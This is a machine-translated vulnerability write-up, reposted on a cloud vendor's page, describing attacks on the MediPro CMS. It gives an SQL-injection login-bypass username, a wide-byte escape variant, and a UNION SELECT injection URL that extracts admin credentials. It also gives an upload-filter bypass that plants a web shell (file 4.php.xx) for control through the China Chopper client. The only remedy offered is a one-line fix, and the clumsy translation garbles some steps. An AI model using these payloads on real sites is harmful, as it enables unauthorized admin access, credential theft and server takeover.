MediPro Latest Version injection vulnerability and background get shell

Source: Internet
Author: User

MediPro Latest Version injection vulnerability and background get shell

MediPro has multiple cms websites with loose filtering and injection vulnerabilities. The background can bypass logon and get shell to obtain server permissions.

/* Er, the official website uses zend-encrypted code by default and needs to be decrypted. */

Baidu is still used by many websites ..


1. Background bypass login Vulnerability

If magic_quotes_gpc is not enabled on the server, log on to the system directly. The background is generally www.xxxx.com/adm/

Username: webmaster 'or 1 = 1 or 'A' = 'A /*

Password: Enter the verification code.



In addition, after magic_quotes_gpc is escaped, the old hacker tried to use methods like % d5 % 27, such:

Username user = admin % d5 % 27 or 1 = 1 limit -- this class

Although the admincheck () function is also bypassed, the user value uploaded by the user is directly used in subsequent setcookies. The result cannot be used in subsequent permission verification, continue.





2. registration page Injection Vulnerability

Where do I register a user? regform. php? Membertypeid = 10, there is an injection vulnerability. The problem code appears on the registration page: regform. php, where $ membertypeid is not filtered, and $ membertypeid is directly used by the subsequent functions.



When escape is not enabled:

Http: // website/regform. php? Membertypeid = 10 WHERE 1 = 2 union select 1, 'Password', "user", 0, 'user', from cms_admin t limit --



If magic_quotes_gpc is enabled and the double quotation marks of "user" are escaped, there is also a relatively cumbersome method:

The general method is to union the cms_member_regform_10 table and display the values in the formcolname field (note: this field is the registered item field. This is required because the items on the registration page are dynamically generated. Otherwise, the Administrator account and password cannot be displayed.

For details, see the illustration below.



3. get shell in the background

For example, in/adm/temp.inc.php, the Code filters only the content of the uploaded file, such as ". php. xx ", if you are using windows IIS, you can also change the suffix. asp ,. asa, etc;
 

if ( substr( $fname, 0 - 4 ) == ".php" || substr( $fname, 0 - 4 ) == ".exe" ){            err( $strDownNotice11, "", "" );  }


After logging on to the background, access www.xxxxx.com/adm/tempftp.php directly? Fold = default

Upload a sentence: 4. php. xx



Upload path: www.xxxxx.com/templates/default/4.php.xx



Kitchen knife open circuit ~~



Note: The 4. php. xx used for testing has been deleted.

Solution:

Filter parameters to restrict upload.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.